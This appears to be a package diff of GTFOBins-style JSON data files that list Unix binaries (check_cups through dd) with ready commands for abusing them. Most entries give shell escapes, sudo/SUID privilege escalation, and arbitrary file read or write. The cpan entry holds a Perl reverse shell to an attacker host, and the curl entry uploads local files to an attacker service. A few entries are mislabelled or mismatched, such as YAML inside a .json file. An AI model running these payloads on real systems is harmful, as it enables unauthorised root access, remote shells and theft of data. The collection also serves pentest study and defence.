gtfobins-cli 1.0.0__py3-none-any.whl

gtfo/data/check_cups.json

@@ -0,0 +1,15 @@
+{
+  "description": "This is the 'check_cups' Nagios plugin, available e.g. in '/usr/lib/nagios/plugins/'. The read file content is limited to the first line.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "check_cups --extra-opts=@[file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo check_cups --extra-opts=@[file]\n"
+      }
+    ]
+  }
+}

gtfo/data/check_log.json

@@ -0,0 +1,20 @@
+{
+    "description": "This is the 'check_log' Nagios plugin, available e.g. in '/usr/lib/nagios/plugins/'.\n",
+    "functions": {
+      "file-read": [
+        {
+          "code": "check_log -F [file] -O [output]\ncat [output]\n"
+        }
+      ],
+      "file-write": [
+        {
+          "code": "check_log -F [input] -O [file]\n"
+        }
+      ],
+      "sudo": [
+        {
+          "code": "sudo check_log -F [input] -O [file]\n"
+        }
+      ]
+    }
+  }

gtfo/data/check_memory.json

@@ -0,0 +1,15 @@
+{
+  "description": "This is the 'check_memory' Nagios plugin, available e.g. in '/usr/lib/nagios/plugins/'. The read file content is limited to the first line.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "check_memory --extra-opts=@[file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo check_memory --extra-opts=@[file]\n"
+      }
+    ]
+  }
+}

gtfo/data/check_raid.json

@@ -0,0 +1,15 @@
+{
+  "description": "This is the 'check_raid' Nagios plugin, available e.g. in '/usr/lib/nagios/plugins/'. The read file content is limited to the first line.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "check_raid --extra-opts=@[file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo check_raid --extra-opts=@[file]\n"
+      }
+    ]
+  }
+}

gtfo/data/check_ssl_cert.json

@@ -0,0 +1,17 @@
+{
+  "description": "This is the 'check_by_ssh' Nagios plugin, available e.g. in '/usr/lib/nagios/plugins/'.\n",
+  "functions": {
+    "command": [
+      {
+        "description": "The host example.net must return a certificate via TLS",
+        "code": "TF=$(mktemp)\necho \"[command] | tee [file]\" > $TF\nchmod +x $TF\ncheck_ssl_cert --curl-bin $TF -H example.net\ncat [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "The host example.net must return a certificate via TLS",
+        "code": "TF=$(mktemp)\necho \"[command] | tee [file]\" > $TF\nchmod +x $TF\numask 022\ncheck_ssl_cert --curl-bin $TF -H example.net\ncat [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/check_statusfile.json

@@ -0,0 +1,15 @@
+{
+  "description": "This is the 'check_statusfile' Nagios plugi plugin, available e.g. in '/usr/lib/nagios/plugins/'. The read file content is limited to the first line.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "check_statusfile [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo check_statusfile [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/chmod.json

@@ -0,0 +1,15 @@
+{
+  "description": "This can be run with elevated privileges to change permissions ('6' denotes the SUID bits) and then read, write, or execute a file.",
+  "functions": {
+    "suid": [
+      {
+        "code": "./chmod 6777 [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo chmod 6777 [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/chown.json

@@ -0,0 +1,15 @@
+{
+  "description": "This can be run with elevated privileges to change ownership and then read, write, or execute a file.",
+  "functions": {
+    "suid": [
+      {
+        "code": "./chown $(id -un):$(id -gn) [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo chown $(id -un):$(id -gn) [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/chroot.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "suid": [
+      {
+        "code": "./chroot / /bin/sh -p\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo chroot /\n"
+      }
+    ]
+  }
+}

gtfo/data/cobc.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "TF=$(mktemp -d)\necho 'CALL \"SYSTEM\" USING \"/bin/sh\".' > $TF/x\ncobc -xFj --frelax-syntax-checks $TF/x\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp -d)\necho 'CALL \"SYSTEM\" USING \"/bin/sh\".' > $TF/x\nsudo cobc -xFj --frelax-syntax-checks $TF/x\n"
+      }
+    ]
+  }
+}

gtfo/data/column.json

@@ -0,0 +1,20 @@
+{
+  "description": "'column' expects textual data.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "column [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./column [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo column [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/comm.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "comm [file] /dev/null 2>/dev/null\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "comm [file] /dev/null 2>/dev/null\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo comm [file] /dev/null 2>/dev/null\n"
+      }
+    ]
+  }
+}

gtfo/data/composer.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "TF=$(mktemp -d)\necho '{\"scripts\":{\"x\":\"/bin/sh -i 0<&3 1>&3 2>&3\"}}' >$TF/composer.json\ncomposer --working-dir=$TF run-script x\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "TF=$(mktemp -d)\necho '{\"scripts\":{\"x\":\"/bin/sh -i 0<&3 1>&3 2>&3\"}}' >$TF/composer.json\n./composer --working-dir=$TF run-script x\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp -d)\necho '{\"scripts\":{\"x\":\"/bin/sh -i 0<&3 1>&3 2>&3\"}}' >$TF/composer.json\nsudo composer --working-dir=$TF run-script x\n"
+      }
+    ]
+  }
+}

gtfo/data/cowsay.json

@@ -0,0 +1,15 @@
+{
+  "description": "It allows to execute Perl code, other functions may apply.",
+  "functions": {
+    "shell": [
+      {
+        "code": "TF=$(mktemp)\necho 'exec \"/bin/sh\";' >$TF\ncowsay -f $TF x\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp)\necho 'exec \"/bin/sh\";' >$TF\nsudo cowsay -f $TF x\n"
+      }
+    ]
+  }
+}

gtfo/data/cowthink.json

@@ -0,0 +1,14 @@
+---
+description: It allows to execute Perl code, other functions may apply.
+functions:
+  shell:
+    - code: |
+        TF=$(mktemp)
+        echo 'exec "/bin/sh";' >$TF
+        cowthink -f $TF x
+  sudo:
+    - code: |
+        TF=$(mktemp)
+        echo 'exec "/bin/sh";' >$TF
+        sudo cowthink -f $TF x
+---

gtfo/data/cp.json

@@ -0,0 +1,32 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "cp \"[file]\" /dev/stdout\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "echo \"DATA\" | cp /dev/stdin \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "echo \"DATA\" | ./cp /dev/stdin \"[file]\"\n"
+      },
+      {
+        "description": "This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.",
+        "code": "TF=$(mktemp)\necho \"DATA\" > $TF\n./cp $TF [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "echo \"DATA\" | sudo cp /dev/stdin \"[file]\"\n"
+      },
+      {
+        "description": "This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.",
+        "code": "TF=$(mktemp)\necho \"DATA\" > $TF\nsudo cp $TF [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/cpan.json

@@ -0,0 +1,33 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "'cpan' lets you execute perl commands with the '! command'.\n",
+        "code": "cpan\n! exec '/bin/bash'\n"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'nc -lvp [port]' on the attacker box to receive the shell.",
+        "code": "export RHOST=[host]\nexport RPORT=[port]\ncpan\n! use Socket; my $i=\"$ENV{RHOST}\"; my $p=$ENV{RPORT}; socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\"); open(STDOUT,\">&S\"); open(STDERR,\">&S\"); exec(\"/bin/sh -i\");};\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Serve files in the local folder running an HTTP server on port 8080. Install the dependency via 'cpan HTTP::Server::Simple'.",
+        "code": "cpan\n! use HTTP::Server::Simple; my $server= HTTP::Server::Simple->new(); $server->run();\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via an HTTP GET request and store it in 'PWD'.",
+        "code": "export URL=[host]/[file]\ncpan\n! use File::Fetch; my $file = (File::Fetch->new(uri => \"$ENV{URL}\"))->fetch();\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo cpan\n! exec '/bin/bash'\n"
+      }
+    ]
+  }
+}

gtfo/data/cpio.json

@@ -0,0 +1,48 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "echo '/bin/sh </dev/tty >/dev/tty' >localhost\ncpio -o --rsh-command /bin/sh -F localhost:\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "The content of the file is printed to standard output, between the cpio archive format header and footer.",
+        "code": "echo \"[file]\" | cpio -o\n"
+      },
+      {
+        "description": "The whole directory structure is copied to '$TF'.",
+        "code": "TF=$(mktemp -d)\necho \"[file]\" | cpio -dp $TF\ncat \"$TF/[file]\"\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "Copies the file to the dir directory.",
+        "code": "echo [data] >[file]\necho [file] | cpio -up [dir]\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "The whole directory structure is copied to '$TF'.",
+        "code": "TF=$(mktemp -d)\necho \"[file]\" | ./cpio -R $UID -dp $TF\ncat \"$TF/[file]\"\n"
+      },
+      {
+        "description": "Copies `$LFILE` to the `$LDIR` directory.",
+        "code": "echo [data] >[file]\necho [file] | ./cpio -R 0:0 -p [dir]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "echo '/bin/sh </dev/tty >/dev/tty' >localhost\nsudo cpio -o --rsh-command /bin/sh -F localhost:\n"
+      },
+      {
+        "description": "The whole directory structure is copied to '$TF'.",
+        "code": "TF=$(mktemp -d)\necho \"[file]\" | sudo cpio -R $UID -dp $TF\ncat \"$TF/[file]\"\n"
+      },
+      {
+        "description": "Copies the file to the dir directory.",
+        "code": "echo [data] >[file]\necho [file] | sudo cpio -R 0:0 -p [dir]\n"
+      }
+    ]
+  }
+}

gtfo/data/cpulimit.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "cpulimit -l 100 -f /bin/sh"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./cpulimit -l 100 -f -- /bin/sh -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo cpulimit -l 100 -f /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/crash.json

@@ -0,0 +1,21 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "crash -h\n!sh\n"
+      }
+    ],
+    "command": [
+      {
+        "code": "CRASHPAGER=\"[command]\" crash -h\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "sudo crash -h\n!sh\n"
+      }
+    ]
+  }
+}

gtfo/data/crontab.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "command": [
+      {
+        "description": "The commands are executed according to the crontab file edited via the 'crontab' utility.",
+        "code": "crontab -e"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "The commands are executed according to the crontab file edited via the 'crontab' utility.",
+        "code": "sudo crontab -e"
+      }
+    ]
+  }
+}

gtfo/data/csh.json

@@ -0,0 +1,24 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "csh"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "ash -c 'echo DATA > [file]'\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./csh -b"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo csh"
+      }
+    ]
+  }
+}

gtfo/data/csplit.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "csplit [file] 1\ncat xx01\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "csplit [file] 1\ncat xx01\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "csplit [file] 1\ncat xx01\n"
+      }
+    ]
+  }
+}

gtfo/data/csvtool.json

@@ -0,0 +1,31 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "description": "The file is actually parsed and manipulated as CSV, so this might not be suitable for arbitrary data.",
+        "code": "csvtool trim t [file]\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "The file is actually parsed and manipulated as CSV, so this might not be suitable for arbitrary data.",
+        "code": "TF=$(mktemp)\necho [data] > $TF\ncsvtool trim t $TF -o [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./csvtool trim t [file]\n"
+      }
+    ],
+    "shell": [
+      {
+        "code": "csvtool call '/bin/sh;false' /etc/passwd"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo csvtool call '/bin/sh;false' /etc/passwd"
+      }
+    ]
+  }
+}

gtfo/data/cupsfilter.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "cupsfilter -i application/octet-stream -m application/octet-stream [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo cupsfilter -i application/octet-stream -m application/octet-stream [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./cupsfilter -i application/octet-stream -m application/octet-stream [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/curl.json

@@ -0,0 +1,34 @@
+{
+  "functions": {
+    "file-upload": [
+      {
+        "description": "Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the '@' to send hard-coded data.",
+        "code": "curl -X POST -d @[file] [url]\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "curl [url] -o [file]\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "The file path must be absolute.",
+        "code": "curl file://[file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "./curl [url] -o [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "sudo curl [url] -o [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/cut.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "cut -d \"\" -f1 [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./cut -d \"\" -f1 [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo cut -d \"\" -f1 [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/dash.json

@@ -0,0 +1,24 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "dash"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "dash -c 'echo DATA > [file]'\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./dash -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo dash"
+      }
+    ]
+  }
+}

gtfo/data/date.json

@@ -0,0 +1,20 @@
+{
+  "description": "Each line is corrupted by a prefix string and wrapped inside quotes, so this may not be suitable for binary files. This only works for the GNU variant of 'date'.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "date -f [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./date -f [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo date -f [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/dd.json

@@ -0,0 +1,24 @@
+{
+  "functions": {
+    "file-write": [
+      {
+        "code": "echo \"DATA\" | dd of=[file]\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "dd if=[file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "echo \"DATA\" | ./dd of=[file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "echo \"DATA\" | sudo dd of=[file]\n"
+      }
+    ]
+  }
+}